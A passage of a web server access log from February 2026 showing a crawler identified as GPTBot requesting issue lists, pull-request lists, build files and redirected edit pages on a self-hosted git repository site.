+0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:19:07:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:19:07:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:19:07:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:19:07:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:19:07:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:19:07:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&sort=latest&state=open&type=all" -[17/Feb/2026:19:07:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:07:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:07:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:07:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&sort=latest&state=open&type=all" -[17/Feb/2026:19:07:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&state=closed&type=all" -[17/Feb/2026:19:07:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:07:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=latest&state=open&type=all" -[17/Feb/2026:19:07:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=latest&state=open&type=all" -[17/Feb/2026:19:07:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=latest&state=open&type=all" -[17/Feb/2026:19:07:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&sort=latest&state=open&type=all" -[17/Feb/2026:19:07:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:07:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:07:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:19:07:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:07:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=closed&type=all" -[17/Feb/2026:19:07:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:07:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=latest&state=open&type=all" -[17/Feb/2026:19:07:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15344] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:19:07:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11622] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:19:07:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:19:07:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11096] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:19:07:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11070] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:19:07:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11068] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:19:07:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11094] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:19:07:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:19:07:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11618] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:19:07:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11069] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:19:07:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11620] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:19:07:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11616] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:19:07:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11620] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:19:07:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:19:07:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:19:07:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11617] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:19:07:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&state=closed&type=all" -[17/Feb/2026:19:07:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&sort=oldest&state=open&type=all" -[17/Feb/2026:19:07:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:07:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:07:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:07:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:07:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&sort=oldest&state=open&type=all" -[17/Feb/2026:19:07:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:07:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:07:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:07:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:07:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:07:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:07:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:07:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 